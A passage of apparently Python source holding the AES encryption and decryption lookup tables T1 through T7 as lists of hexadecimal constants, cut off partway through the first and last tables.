0xdde3e33e, 0x5e2f2f71, 0x13848497, 0xa65353f5, 0xb9d1d168, 0x00000000, 0xc1eded2c, 0x40202060, 0xe3fcfc1f, 0x79b1b1c8, 0xb65b5bed, 0xd46a6abe, 0x8dcbcb46, 0x67bebed9, 0x7239394b, 0x944a4ade, 0x984c4cd4, 0xb05858e8, 0x85cfcf4a, 0xbbd0d06b, 0xc5efef2a, 0x4faaaae5, 0xedfbfb16, 0x864343c5, 0x9a4d4dd7, 0x66333355, 0x11858594, 0x8a4545cf, 0xe9f9f910, 0x04020206, 0xfe7f7f81, 0xa05050f0, 0x783c3c44, 0x259f9fba, 0x4ba8a8e3, 0xa25151f3, 0x5da3a3fe, 0x804040c0, 0x058f8f8a, 0x3f9292ad, 0x219d9dbc, 0x70383848, 0xf1f5f504, 0x63bcbcdf, 0x77b6b6c1, 0xafdada75, 0x42212163, 0x20101030, 0xe5ffff1a, 0xfdf3f30e, 0xbfd2d26d, 0x81cdcd4c, 0x180c0c14, 0x26131335, 0xc3ecec2f, 0xbe5f5fe1, 0x359797a2, 0x884444cc, 0x2e171739, 0x93c4c457, 0x55a7a7f2, 0xfc7e7e82, 0x7a3d3d47, 0xc86464ac, 0xba5d5de7, 0x3219192b, 0xe6737395, 0xc06060a0, 0x19818198, 0x9e4f4fd1, 0xa3dcdc7f, 0x44222266, 0x542a2a7e, 0x3b9090ab, 0x0b888883, 0x8c4646ca, 0xc7eeee29, 0x6bb8b8d3, 0x2814143c, 0xa7dede79, 0xbc5e5ee2, 0x160b0b1d, 0xaddbdb76, 0xdbe0e03b, 0x64323256, 0x743a3a4e, 0x140a0a1e, 0x924949db, 0x0c06060a, 0x4824246c, 0xb85c5ce4, 0x9fc2c25d, 0xbdd3d36e, 0x43acacef, 0xc46262a6, 0x399191a8, 0x319595a4, 0xd3e4e437, 0xf279798b, 0xd5e7e732, 0x8bc8c843, 0x6e373759, 0xda6d6db7, 0x018d8d8c, 0xb1d5d564, 0x9c4e4ed2, 0x49a9a9e0, 0xd86c6cb4, 0xac5656fa, 0xf3f4f407, 0xcfeaea25, 0xca6565af, 0xf47a7a8e, 0x47aeaee9, 0x10080818, 0x6fbabad5, 0xf0787888, 0x4a25256f, 0x5c2e2e72, 0x381c1c24, 0x57a6a6f1, 0x73b4b4c7, 0x97c6c651, 0xcbe8e823, 0xa1dddd7c, 0xe874749c, 0x3e1f1f21, 0x964b4bdd, 0x61bdbddc, 0x0d8b8b86, 0x0f8a8a85, 0xe0707090, 0x7c3e3e42, 0x71b5b5c4, 0xcc6666aa, 0x904848d8, 0x06030305, 0xf7f6f601, 0x1c0e0e12, 0xc26161a3, 0x6a35355f, 0xae5757f9, 0x69b9b9d0, 0x17868691, 0x99c1c158, 0x3a1d1d27, 0x279e9eb9, 0xd9e1e138, 0xebf8f813, 0x2b9898b3, 0x22111133, 0xd26969bb, 0xa9d9d970, 0x078e8e89, 0x339494a7, 0x2d9b9bb6, 0x3c1e1e22, 0x15878792, 0xc9e9e920, 0x87cece49, 0xaa5555ff, 0x50282878, 0xa5dfdf7a, 0x038c8c8f, 0x59a1a1f8, 0x09898980, 0x1a0d0d17, 0x65bfbfda, 0xd7e6e631, 0x844242c6, 0xd06868b8, 0x824141c3, 0x299999b0, 0x5a2d2d77, 0x1e0f0f11, 0x7bb0b0cb, 0xa85454fc, 0x6dbbbbd6, 0x2c16163a]
T2 = [0xa5c66363, 0x84f87c7c, 0x99ee7777, 0x8df67b7b, 0x0dfff2f2, 0xbdd66b6b, 0xb1de6f6f, 0x5491c5c5, 0x50603030, 0x03020101, 0xa9ce6767, 0x7d562b2b, 0x19e7fefe, 0x62b5d7d7, 0xe64dabab, 0x9aec7676, 0x458fcaca, 0x9d1f8282, 0x4089c9c9, 0x87fa7d7d, 0x15effafa, 0xebb25959, 0xc98e4747, 0x0bfbf0f0, 0xec41adad, 0x67b3d4d4, 0xfd5fa2a2, 0xea45afaf, 0xbf239c9c, 0xf753a4a4, 0x96e47272, 0x5b9bc0c0, 0xc275b7b7, 0x1ce1fdfd, 0xae3d9393, 0x6a4c2626, 0x5a6c3636, 0x417e3f3f, 0x02f5f7f7, 0x4f83cccc, 0x5c683434, 0xf451a5a5, 0x34d1e5e5, 0x08f9f1f1, 0x93e27171, 0x73abd8d8, 0x53623131, 0x3f2a1515, 0x0c080404, 0x5295c7c7, 0x65462323, 0x5e9dc3c3, 0x28301818, 0xa1379696, 0x0f0a0505, 0xb52f9a9a, 0x090e0707, 0x36241212, 0x9b1b8080, 0x3ddfe2e2, 0x26cdebeb, 0x694e2727, 0xcd7fb2b2, 0x9fea7575, 0x1b120909, 0x9e1d8383, 0x74582c2c, 0x2e341a1a, 0x2d361b1b, 0xb2dc6e6e, 0xeeb45a5a, 0xfb5ba0a0, 0xf6a45252, 0x4d763b3b, 0x61b7d6d6, 0xce7db3b3, 0x7b522929, 0x3edde3e3, 0x715e2f2f, 0x97138484, 0xf5a65353, 0x68b9d1d1, 0x00000000, 0x2cc1eded, 0x60402020, 0x1fe3fcfc, 0xc879b1b1, 0xedb65b5b, 0xbed46a6a, 0x468dcbcb, 0xd967bebe, 0x4b723939, 0xde944a4a, 0xd4984c4c, 0xe8b05858, 0x4a85cfcf, 0x6bbbd0d0, 0x2ac5efef, 0xe54faaaa, 0x16edfbfb, 0xc5864343, 0xd79a4d4d, 0x55663333, 0x94118585, 0xcf8a4545, 0x10e9f9f9, 0x06040202, 0x81fe7f7f, 0xf0a05050, 0x44783c3c, 0xba259f9f, 0xe34ba8a8, 0xf3a25151, 0xfe5da3a3, 0xc0804040, 0x8a058f8f, 0xad3f9292, 0xbc219d9d, 0x48703838, 0x04f1f5f5, 0xdf63bcbc, 0xc177b6b6, 0x75afdada, 0x63422121, 0x30201010, 0x1ae5ffff, 0x0efdf3f3, 0x6dbfd2d2, 0x4c81cdcd, 0x14180c0c, 0x35261313, 0x2fc3ecec, 0xe1be5f5f, 0xa2359797, 0xcc884444, 0x392e1717, 0x5793c4c4, 0xf255a7a7, 0x82fc7e7e, 0x477a3d3d, 0xacc86464, 0xe7ba5d5d, 0x2b321919, 0x95e67373, 0xa0c06060, 0x98198181, 0xd19e4f4f, 0x7fa3dcdc, 0x66442222, 0x7e542a2a, 0xab3b9090, 0x830b8888, 0xca8c4646, 0x29c7eeee, 0xd36bb8b8, 0x3c281414, 0x79a7dede, 0xe2bc5e5e, 0x1d160b0b, 0x76addbdb, 0x3bdbe0e0, 0x56643232, 0x4e743a3a, 0x1e140a0a, 0xdb924949, 0x0a0c0606, 0x6c482424, 0xe4b85c5c, 0x5d9fc2c2, 0x6ebdd3d3, 0xef43acac, 0xa6c46262, 0xa8399191, 0xa4319595, 0x37d3e4e4, 0x8bf27979, 0x32d5e7e7, 0x438bc8c8, 0x596e3737, 0xb7da6d6d, 0x8c018d8d, 0x64b1d5d5, 0xd29c4e4e, 0xe049a9a9, 0xb4d86c6c, 0xfaac5656, 0x07f3f4f4, 0x25cfeaea, 0xafca6565, 0x8ef47a7a, 0xe947aeae, 0x18100808, 0xd56fbaba, 0x88f07878, 0x6f4a2525, 0x725c2e2e, 0x24381c1c, 0xf157a6a6, 0xc773b4b4, 0x5197c6c6, 0x23cbe8e8, 0x7ca1dddd, 0x9ce87474, 0x213e1f1f, 0xdd964b4b, 0xdc61bdbd, 0x860d8b8b, 0x850f8a8a, 0x90e07070, 0x427c3e3e, 0xc471b5b5, 0xaacc6666, 0xd8904848, 0x05060303, 0x01f7f6f6, 0x121c0e0e, 0xa3c26161, 0x5f6a3535, 0xf9ae5757, 0xd069b9b9, 0x91178686, 0x5899c1c1, 0x273a1d1d, 0xb9279e9e, 0x38d9e1e1, 0x13ebf8f8, 0xb32b9898, 0x33221111, 0xbbd26969, 0x70a9d9d9, 0x89078e8e, 0xa7339494, 0xb62d9b9b, 0x223c1e1e, 0x92158787, 0x20c9e9e9, 0x4987cece, 0xffaa5555, 0x78502828, 0x7aa5dfdf, 0x8f038c8c, 0xf859a1a1, 0x80098989, 0x171a0d0d, 0xda65bfbf, 0x31d7e6e6, 0xc6844242, 0xb8d06868, 0xc3824141, 0xb0299999, 0x775a2d2d, 0x111e0f0f, 0xcb7bb0b0, 0xfca85454, 0xd66dbbbb, 0x3a2c1616]
T3 = [0x63a5c663, 0x7c84f87c, 0x7799ee77, 0x7b8df67b, 0xf20dfff2, 0x6bbdd66b, 0x6fb1de6f, 0xc55491c5, 0x30506030, 0x01030201, 0x67a9ce67, 0x2b7d562b, 0xfe19e7fe, 0xd762b5d7, 0xabe64dab, 0x769aec76, 0xca458fca, 0x829d1f82, 0xc94089c9, 0x7d87fa7d, 0xfa15effa, 0x59ebb259, 0x47c98e47, 0xf00bfbf0, 0xadec41ad, 0xd467b3d4, 0xa2fd5fa2, 0xafea45af, 0x9cbf239c, 0xa4f753a4, 0x7296e472, 0xc05b9bc0, 0xb7c275b7, 0xfd1ce1fd, 0x93ae3d93, 0x266a4c26, 0x365a6c36, 0x3f417e3f, 0xf702f5f7, 0xcc4f83cc, 0x345c6834, 0xa5f451a5, 0xe534d1e5, 0xf108f9f1, 0x7193e271, 0xd873abd8, 0x31536231, 0x153f2a15, 0x040c0804, 0xc75295c7, 0x23654623, 0xc35e9dc3, 0x18283018, 0x96a13796, 0x050f0a05, 0x9ab52f9a, 0x07090e07, 0x12362412, 0x809b1b80, 0xe23ddfe2, 0xeb26cdeb, 0x27694e27, 0xb2cd7fb2, 0x759fea75, 0x091b1209, 0x839e1d83, 0x2c74582c, 0x1a2e341a, 0x1b2d361b, 0x6eb2dc6e, 0x5aeeb45a, 0xa0fb5ba0, 0x52f6a452, 0x3b4d763b, 0xd661b7d6, 0xb3ce7db3, 0x297b5229, 0xe33edde3, 0x2f715e2f, 0x84971384, 0x53f5a653, 0xd168b9d1, 0x00000000, 0xed2cc1ed, 0x20604020, 0xfc1fe3fc, 0xb1c879b1, 0x5bedb65b, 0x6abed46a, 0xcb468dcb, 0xbed967be, 0x394b7239, 0x4ade944a, 0x4cd4984c, 0x58e8b058, 0xcf4a85cf, 0xd06bbbd0, 0xef2ac5ef, 0xaae54faa, 0xfb16edfb, 0x43c58643, 0x4dd79a4d, 0x33556633, 0x85941185, 0x45cf8a45, 0xf910e9f9, 0x02060402, 0x7f81fe7f, 0x50f0a050, 0x3c44783c, 0x9fba259f, 0xa8e34ba8, 0x51f3a251, 0xa3fe5da3, 0x40c08040, 0x8f8a058f, 0x92ad3f92, 0x9dbc219d, 0x38487038, 0xf504f1f5, 0xbcdf63bc, 0xb6c177b6, 0xda75afda, 0x21634221, 0x10302010, 0xff1ae5ff, 0xf30efdf3, 0xd26dbfd2, 0xcd4c81cd, 0x0c14180c, 0x13352613, 0xec2fc3ec, 0x5fe1be5f, 0x97a23597, 0x44cc8844, 0x17392e17, 0xc45793c4, 0xa7f255a7, 0x7e82fc7e, 0x3d477a3d, 0x64acc864, 0x5de7ba5d, 0x192b3219, 0x7395e673, 0x60a0c060, 0x81981981, 0x4fd19e4f, 0xdc7fa3dc, 0x22664422, 0x2a7e542a, 0x90ab3b90, 0x88830b88, 0x46ca8c46, 0xee29c7ee, 0xb8d36bb8, 0x143c2814, 0xde79a7de, 0x5ee2bc5e, 0x0b1d160b, 0xdb76addb, 0xe03bdbe0, 0x32566432, 0x3a4e743a, 0x0a1e140a, 0x49db9249, 0x060a0c06, 0x246c4824, 0x5ce4b85c, 0xc25d9fc2, 0xd36ebdd3, 0xacef43ac, 0x62a6c462, 0x91a83991, 0x95a43195, 0xe437d3e4, 0x798bf279, 0xe732d5e7, 0xc8438bc8, 0x37596e37, 0x6db7da6d, 0x8d8c018d, 0xd564b1d5, 0x4ed29c4e, 0xa9e049a9, 0x6cb4d86c, 0x56faac56, 0xf407f3f4, 0xea25cfea, 0x65afca65, 0x7a8ef47a, 0xaee947ae, 0x08181008, 0xbad56fba, 0x7888f078, 0x256f4a25, 0x2e725c2e, 0x1c24381c, 0xa6f157a6, 0xb4c773b4, 0xc65197c6, 0xe823cbe8, 0xdd7ca1dd, 0x749ce874, 0x1f213e1f, 0x4bdd964b, 0xbddc61bd, 0x8b860d8b, 0x8a850f8a, 0x7090e070, 0x3e427c3e, 0xb5c471b5, 0x66aacc66, 0x48d89048, 0x03050603, 0xf601f7f6, 0x0e121c0e, 0x61a3c261, 0x355f6a35, 0x57f9ae57, 0xb9d069b9, 0x86911786, 0xc15899c1, 0x1d273a1d, 0x9eb9279e, 0xe138d9e1, 0xf813ebf8, 0x98b32b98, 0x11332211, 0x69bbd269, 0xd970a9d9, 0x8e89078e, 0x94a73394, 0x9bb62d9b, 0x1e223c1e, 0x87921587, 0xe920c9e9, 0xce4987ce, 0x55ffaa55, 0x28785028, 0xdf7aa5df, 0x8c8f038c, 0xa1f859a1, 0x89800989, 0x0d171a0d, 0xbfda65bf, 0xe631d7e6, 0x42c68442, 0x68b8d068, 0x41c38241, 0x99b02999, 0x2d775a2d, 0x0f111e0f, 0xb0cb7bb0, 0x54fca854, 0xbbd66dbb, 0x163a2c16]
T4 = [0x6363a5c6, 0x7c7c84f8, 0x777799ee, 0x7b7b8df6, 0xf2f20dff, 0x6b6bbdd6, 0x6f6fb1de, 0xc5c55491, 0x30305060, 0x01010302, 0x6767a9ce, 0x2b2b7d56, 0xfefe19e7, 0xd7d762b5, 0xababe64d, 0x76769aec, 0xcaca458f, 0x82829d1f, 0xc9c94089, 0x7d7d87fa, 0xfafa15ef, 0x5959ebb2, 0x4747c98e, 0xf0f00bfb, 0xadadec41, 0xd4d467b3, 0xa2a2fd5f, 0xafafea45, 0x9c9cbf23, 0xa4a4f753, 0x727296e4, 0xc0c05b9b, 0xb7b7c275, 0xfdfd1ce1, 0x9393ae3d, 0x26266a4c, 0x36365a6c, 0x3f3f417e, 0xf7f702f5, 0xcccc4f83, 0x34345c68, 0xa5a5f451, 0xe5e534d1, 0xf1f108f9, 0x717193e2, 0xd8d873ab, 0x31315362, 0x15153f2a, 0x04040c08, 0xc7c75295, 0x23236546, 0xc3c35e9d, 0x18182830, 0x9696a137, 0x05050f0a, 0x9a9ab52f, 0x0707090e, 0x12123624, 0x80809b1b, 0xe2e23ddf, 0xebeb26cd, 0x2727694e, 0xb2b2cd7f, 0x75759fea, 0x09091b12, 0x83839e1d, 0x2c2c7458, 0x1a1a2e34, 0x1b1b2d36, 0x6e6eb2dc, 0x5a5aeeb4, 0xa0a0fb5b, 0x5252f6a4, 0x3b3b4d76, 0xd6d661b7, 0xb3b3ce7d, 0x29297b52, 0xe3e33edd, 0x2f2f715e, 0x84849713, 0x5353f5a6, 0xd1d168b9, 0x00000000, 0xeded2cc1, 0x20206040, 0xfcfc1fe3, 0xb1b1c879, 0x5b5bedb6, 0x6a6abed4, 0xcbcb468d, 0xbebed967, 0x39394b72, 0x4a4ade94, 0x4c4cd498, 0x5858e8b0, 0xcfcf4a85, 0xd0d06bbb, 0xefef2ac5, 0xaaaae54f, 0xfbfb16ed, 0x4343c586, 0x4d4dd79a, 0x33335566, 0x85859411, 0x4545cf8a, 0xf9f910e9, 0x02020604, 0x7f7f81fe, 0x5050f0a0, 0x3c3c4478, 0x9f9fba25, 0xa8a8e34b, 0x5151f3a2, 0xa3a3fe5d, 0x4040c080, 0x8f8f8a05, 0x9292ad3f, 0x9d9dbc21, 0x38384870, 0xf5f504f1, 0xbcbcdf63, 0xb6b6c177, 0xdada75af, 0x21216342, 0x10103020, 0xffff1ae5, 0xf3f30efd, 0xd2d26dbf, 0xcdcd4c81, 0x0c0c1418, 0x13133526, 0xecec2fc3, 0x5f5fe1be, 0x9797a235, 0x4444cc88, 0x1717392e, 0xc4c45793, 0xa7a7f255, 0x7e7e82fc, 0x3d3d477a, 0x6464acc8, 0x5d5de7ba, 0x19192b32, 0x737395e6, 0x6060a0c0, 0x81819819, 0x4f4fd19e, 0xdcdc7fa3, 0x22226644, 0x2a2a7e54, 0x9090ab3b, 0x8888830b, 0x4646ca8c, 0xeeee29c7, 0xb8b8d36b, 0x14143c28, 0xdede79a7, 0x5e5ee2bc, 0x0b0b1d16, 0xdbdb76ad, 0xe0e03bdb, 0x32325664, 0x3a3a4e74, 0x0a0a1e14, 0x4949db92, 0x06060a0c, 0x24246c48, 0x5c5ce4b8, 0xc2c25d9f, 0xd3d36ebd, 0xacacef43, 0x6262a6c4, 0x9191a839, 0x9595a431, 0xe4e437d3, 0x79798bf2, 0xe7e732d5, 0xc8c8438b, 0x3737596e, 0x6d6db7da, 0x8d8d8c01, 0xd5d564b1, 0x4e4ed29c, 0xa9a9e049, 0x6c6cb4d8, 0x5656faac, 0xf4f407f3, 0xeaea25cf, 0x6565afca, 0x7a7a8ef4, 0xaeaee947, 0x08081810, 0xbabad56f, 0x787888f0, 0x25256f4a, 0x2e2e725c, 0x1c1c2438, 0xa6a6f157, 0xb4b4c773, 0xc6c65197, 0xe8e823cb, 0xdddd7ca1, 0x74749ce8, 0x1f1f213e, 0x4b4bdd96, 0xbdbddc61, 0x8b8b860d, 0x8a8a850f, 0x707090e0, 0x3e3e427c, 0xb5b5c471, 0x6666aacc, 0x4848d890, 0x03030506, 0xf6f601f7, 0x0e0e121c, 0x6161a3c2, 0x35355f6a, 0x5757f9ae, 0xb9b9d069, 0x86869117, 0xc1c15899, 0x1d1d273a, 0x9e9eb927, 0xe1e138d9, 0xf8f813eb, 0x9898b32b, 0x11113322, 0x6969bbd2, 0xd9d970a9, 0x8e8e8907, 0x9494a733, 0x9b9bb62d, 0x1e1e223c, 0x87879215, 0xe9e920c9, 0xcece4987, 0x5555ffaa, 0x28287850, 0xdfdf7aa5, 0x8c8c8f03, 0xa1a1f859, 0x89898009, 0x0d0d171a, 0xbfbfda65, 0xe6e631d7, 0x4242c684, 0x6868b8d0, 0x4141c382, 0x9999b029, 0x2d2d775a, 0x0f0f111e, 0xb0b0cb7b, 0x5454fca8, 0xbbbbd66d, 0x16163a2c]
# Transformations for decryption
T5 = [0x51f4a750, 0x7e416553, 0x1a17a4c3, 0x3a275e96, 0x3bab6bcb, 0x1f9d45f1, 0xacfa58ab, 0x4be30393, 0x2030fa55, 0xad766df6, 0x88cc7691, 0xf5024c25, 0x4fe5d7fc, 0xc52acbd7, 0x26354480, 0xb562a38f, 0xdeb15a49, 0x25ba1b67, 0x45ea0e98, 0x5dfec0e1, 0xc32f7502, 0x814cf012, 0x8d4697a3, 0x6bd3f9c6, 0x038f5fe7, 0x15929c95, 0xbf6d7aeb, 0x955259da, 0xd4be832d, 0x587421d3, 0x49e06929, 0x8ec9c844, 0x75c2896a, 0xf48e7978, 0x99583e6b, 0x27b971dd, 0xbee14fb6, 0xf088ad17, 0xc920ac66, 0x7dce3ab4, 0x63df4a18, 0xe51a3182, 0x97513360, 0x62537f45, 0xb16477e0, 0xbb6bae84, 0xfe81a01c, 0xf9082b94, 0x70486858, 0x8f45fd19, 0x94de6c87, 0x527bf8b7, 0xab73d323, 0x724b02e2, 0xe31f8f57, 0x6655ab2a, 0xb2eb2807, 0x2fb5c203, 0x86c57b9a, 0xd33708a5, 0x302887f2, 0x23bfa5b2, 0x02036aba, 0xed16825c, 0x8acf1c2b, 0xa779b492, 0xf307f2f0, 0x4e69e2a1, 0x65daf4cd, 0x0605bed5, 0xd134621f, 0xc4a6fe8a, 0x342e539d, 0xa2f355a0, 0x058ae132, 0xa4f6eb75, 0x0b83ec39, 0x4060efaa, 0x5e719f06, 0xbd6e1051, 0x3e218af9, 0x96dd063d, 0xdd3e05ae, 0x4de6bd46, 0x91548db5, 0x71c45d05, 0x0406d46f, 0x605015ff, 0x1998fb24, 0xd6bde997, 0x894043cc, 0x67d99e77, 0xb0e842bd, 0x07898b88, 0xe7195b38, 0x79c8eedb, 0xa17c0a47, 0x7c420fe9, 0xf8841ec9, 0x00000000, 0x09808683, 0x322bed48, 0x1e1170ac, 0x6c5a724e, 0xfd0efffb, 0x0f853856, 0x3daed51e, 0x362d3927, 0x0a0fd964, 0x685ca621, 0x9b5b54d1, 0x24362e3a, 0x0c0a67b1, 0x9357e70f, 0xb4ee96d2, 0x1b9b919e, 0x80c0c54f, 0x61dc20a2, 0x5a774b69, 0x1c121a16, 0xe293ba0a, 0xc0a02ae5, 0x3c22e043, 0x121b171d, 0x0e090d0b, 0xf28bc7ad, 0x2db6a8b9, 0x141ea9c8, 0x57f11985, 0xaf75074c, 0xee99ddbb, 0xa37f60fd, 0xf701269f, 0x5c72f5bc, 0x44663bc5, 0x5bfb7e34, 0x8b432976, 0xcb23c6dc, 0xb6edfc68, 0xb8e4f163, 0xd731dcca, 0x42638510, 0x13972240, 0x84c61120, 0x854a247d, 0xd2bb3df8, 0xaef93211, 0xc729a16d, 0x1d9e2f4b, 0xdcb230f3, 0x0d8652ec, 0x77c1e3d0, 0x2bb3166c, 0xa970b999, 0x119448fa, 0x47e96422, 0xa8fc8cc4, 0xa0f03f1a, 0x567d2cd8, 0x223390ef, 0x87494ec7, 0xd938d1c1, 0x8ccaa2fe, 0x98d40b36, 0xa6f581cf, 0xa57ade28, 0xdab78e26, 0x3fadbfa4, 0x2c3a9de4, 0x5078920d, 0x6a5fcc9b, 0x547e4662, 0xf68d13c2, 0x90d8b8e8, 0x2e39f75e, 0x82c3aff5, 0x9f5d80be, 0x69d0937c, 0x6fd52da9, 0xcf2512b3, 0xc8ac993b, 0x10187da7, 0xe89c636e, 0xdb3bbb7b, 0xcd267809, 0x6e5918f4, 0xec9ab701, 0x834f9aa8, 0xe6956e65, 0xaaffe67e, 0x21bccf08, 0xef15e8e6, 0xbae79bd9, 0x4a6f36ce, 0xea9f09d4, 0x29b07cd6, 0x31a4b2af, 0x2a3f2331, 0xc6a59430, 0x35a266c0, 0x744ebc37, 0xfc82caa6, 0xe090d0b0, 0x33a7d815, 0xf104984a, 0x41ecdaf7, 0x7fcd500e, 0x1791f62f, 0x764dd68d, 0x43efb04d, 0xccaa4d54, 0xe49604df, 0x9ed1b5e3, 0x4c6a881b, 0xc12c1fb8, 0x4665517f, 0x9d5eea04, 0x018c355d, 0xfa877473, 0xfb0b412e, 0xb3671d5a, 0x92dbd252, 0xe9105633, 0x6dd64713, 0x9ad7618c, 0x37a10c7a, 0x59f8148e, 0xeb133c89, 0xcea927ee, 0xb761c935, 0xe11ce5ed, 0x7a47b13c, 0x9cd2df59, 0x55f2733f, 0x1814ce79, 0x73c737bf, 0x53f7cdea, 0x5ffdaa5b, 0xdf3d6f14, 0x7844db86, 0xcaaff381, 0xb968c43e, 0x3824342c, 0xc2a3405f, 0x161dc372, 0xbce2250c, 0x283c498b, 0xff0d9541, 0x39a80171, 0x080cb3de, 0xd8b4e49c, 0x6456c190, 0x7bcb8461, 0xd532b670, 0x486c5c74, 0xd0b85742]
T6 = [0x5051f4a7, 0x537e4165, 0xc31a17a4, 0x963a275e, 0xcb3bab6b, 0xf11f9d45, 0xabacfa58, 0x934be303, 0x552030fa, 0xf6ad766d, 0x9188cc76, 0x25f5024c, 0xfc4fe5d7, 0xd7c52acb, 0x80263544, 0x8fb562a3, 0x49deb15a, 0x6725ba1b, 0x9845ea0e, 0xe15dfec0, 0x02c32f75, 0x12814cf0, 0xa38d4697, 0xc66bd3f9, 0xe7038f5f, 0x9515929c, 0xebbf6d7a, 0xda955259, 0x2dd4be83, 0xd3587421, 0x2949e069, 0x448ec9c8, 0x6a75c289, 0x78f48e79, 0x6b99583e, 0xdd27b971, 0xb6bee14f, 0x17f088ad, 0x66c920ac, 0xb47dce3a, 0x1863df4a, 0x82e51a31, 0x60975133, 0x4562537f, 0xe0b16477, 0x84bb6bae, 0x1cfe81a0, 0x94f9082b, 0x58704868, 0x198f45fd, 0x8794de6c, 0xb7527bf8, 0x23ab73d3, 0xe2724b02, 0x57e31f8f, 0x2a6655ab, 0x07b2eb28, 0x032fb5c2, 0x9a86c57b, 0xa5d33708, 0xf2302887, 0xb223bfa5, 0xba02036a, 0x5ced1682, 0x2b8acf1c, 0x92a779b4, 0xf0f307f2, 0xa14e69e2, 0xcd65daf4, 0xd50605be, 0x1fd13462, 0x8ac4a6fe, 0x9d342e53, 0xa0a2f355, 0x32058ae1, 0x75a4f6eb, 0x390b83ec, 0xaa4060ef, 0x065e719f, 0x51bd6e10, 0xf93e218a, 0x3d96dd06, 0xaedd3e05, 0x464de6bd, 0xb591548d, 0x0571c45d, 0x6f0406d4, 0xff605015, 0x241998fb, 0x97d6bde9, 0xcc894043, 0x7767d99e, 0xbdb0e842, 0x8807898b, 0x38e7195b, 0xdb79c8ee, 0x47a17c0a, 0xe97c420f, 0xc9f8841e, 0x00000000, 0x83098086, 0x48322bed, 0xac1e1170, 0x4e6c5a72, 0xfbfd0eff, 0x560f8538, 0x1e3daed5, 0x27362d39, 0x640a0fd9, 0x21685ca6, 0xd19b5b54, 0x3a24362e, 0xb10c0a67, 0x0f9357e7, 0xd2b4ee96, 0x9e1b9b91, 0x4f80c0c5, 0xa261dc20, 0x695a774b, 0x161c121a, 0x0ae293ba, 0xe5c0a02a, 0x433c22e0, 0x1d121b17, 0x0b0e090d, 0xadf28bc7, 0xb92db6a8, 0xc8141ea9, 0x8557f119, 0x4caf7507, 0xbbee99dd, 0xfda37f60, 0x9ff70126, 0xbc5c72f5, 0xc544663b, 0x345bfb7e, 0x768b4329, 0xdccb23c6, 0x68b6edfc, 0x63b8e4f1, 0xcad731dc, 0x10426385, 0x40139722, 0x2084c611, 0x7d854a24, 0xf8d2bb3d, 0x11aef932, 0x6dc729a1, 0x4b1d9e2f, 0xf3dcb230, 0xec0d8652, 0xd077c1e3, 0x6c2bb316, 0x99a970b9, 0xfa119448, 0x2247e964, 0xc4a8fc8c, 0x1aa0f03f, 0xd8567d2c, 0xef223390, 0xc787494e, 0xc1d938d1, 0xfe8ccaa2, 0x3698d40b, 0xcfa6f581, 0x28a57ade, 0x26dab78e, 0xa43fadbf, 0xe42c3a9d, 0x0d507892, 0x9b6a5fcc, 0x62547e46, 0xc2f68d13, 0xe890d8b8, 0x5e2e39f7, 0xf582c3af, 0xbe9f5d80, 0x7c69d093, 0xa96fd52d, 0xb3cf2512, 0x3bc8ac99, 0xa710187d, 0x6ee89c63, 0x7bdb3bbb, 0x09cd2678, 0xf46e5918, 0x01ec9ab7, 0xa8834f9a, 0x65e6956e, 0x7eaaffe6, 0x0821bccf, 0xe6ef15e8, 0xd9bae79b, 0xce4a6f36, 0xd4ea9f09, 0xd629b07c, 0xaf31a4b2, 0x312a3f23, 0x30c6a594, 0xc035a266, 0x37744ebc, 0xa6fc82ca, 0xb0e090d0, 0x1533a7d8, 0x4af10498, 0xf741ecda, 0x0e7fcd50, 0x2f1791f6, 0x8d764dd6, 0x4d43efb0, 0x54ccaa4d, 0xdfe49604, 0xe39ed1b5, 0x1b4c6a88, 0xb8c12c1f, 0x7f466551, 0x049d5eea, 0x5d018c35, 0x73fa8774, 0x2efb0b41, 0x5ab3671d, 0x5292dbd2, 0x33e91056, 0x136dd647, 0x8c9ad761, 0x7a37a10c, 0x8e59f814, 0x89eb133c, 0xeecea927, 0x35b761c9, 0xede11ce5, 0x3c7a47b1, 0x599cd2df, 0x3f55f273, 0x791814ce, 0xbf73c737, 0xea53f7cd, 0x5b5ffdaa, 0x14df3d6f, 0x867844db, 0x81caaff3, 0x3eb968c4, 0x2c382434, 0x5fc2a340, 0x72161dc3, 0x0cbce225, 0x8b283c49, 0x41ff0d95, 0x7139a801, 0xde080cb3, 0x9cd8b4e4, 0x906456c1, 0x617bcb84, 0x70d532b6, 0x74486c5c, 0x42d0b857]
T7 = [0xa75051f4, 0x65537e41, 0xa4c31a17, 0x5e963a27, 0x6bcb3bab, 0x45f11f9d, 0x58abacfa, 0x03934be3, 0xfa552030, 0x6df6ad76, 0x769188cc, 0x4c25f502, 0xd7fc4fe5, 0xcbd7c52a, 0x44802635, 0xa38fb562, 0x5a49deb1, 0x1b6725ba, 0x0e9845ea, 0xc0e15dfe, 0x7502c32f, 0xf012814c, 0x97a38d46, 0xf9c66bd3, 0x5fe7038f, 0x9c951592, 0x7aebbf6d, 0x59da9552, 0x832dd4be, 0x21d35874, 0x692949e0, 0xc8448ec9, 0x896a75c2, 0x7978f48e, 0x3e6b9958, 0x71dd27b9, 0x4fb6bee1, 0xad17f088, 0xac66c920, 0x3ab47dce, 0x4a1863df, 0x3182e51a, 0x33609751, 0x7f456253, 0x77e0b164, 0xae84bb6b, 0xa01cfe81, 0x2b94f908, 0x68587048, 0xfd198f45, 0x6c8794de, 0xf8b7527b, 0xd323ab73, 0x02e2724b, 0x8f57e31f, 0xab2a6655, 0x2807b2eb, 0xc2032fb5, 0x7b9a86c5, 0x08a5d337, 0x87f23028, 0xa5b223bf, 0x6aba0203, 0x825ced16, 0x1c2b8acf, 0xb492a779, 0xf2f0f307, 0xe2a14e69, 0xf4cd65da, 0xbed50605, 0x621fd134, 0xfe8ac4a6, 0x539d342e, 0x55a0a2f3, 0xe132058a, 0xeb75a4f6, 0xec390b83, 0xefaa4060, 0x9f065e71, 0x1051bd6e, 0x8af93e21, 0x063d96dd, 0x05aedd3e, 0xbd464de6, 0x8db59154, 0x5d0571c4, 0xd46f0406, 0x15ff6050, 0xfb241998, 0xe997d6bd, 0x43cc8940, 0x9e7767d9, 0x42bdb0e8, 0x8b880789, 0x5b38e719, 0xeedb79c8, 0x0a47a17c, 0x0fe97c42, 0x1ec9f884, 0x00000000, 0x86830980, 0xed48322b, 0x70ac1e11, 0x724e6c5a, 0xfffbfd0e, 0x38560f85, 0xd51e3dae, 0x3927362d, 0xd9640a0f, 0xa621685c, 0x54d19b5b, 0x2e3a2436, 0x67b10c0a, 0xe70f9357, 0x96d2b4ee, 0x919e1b9b, 0xc54f80c0, 0x20a261dc, 0x4b695a77, 0x1a161c12, 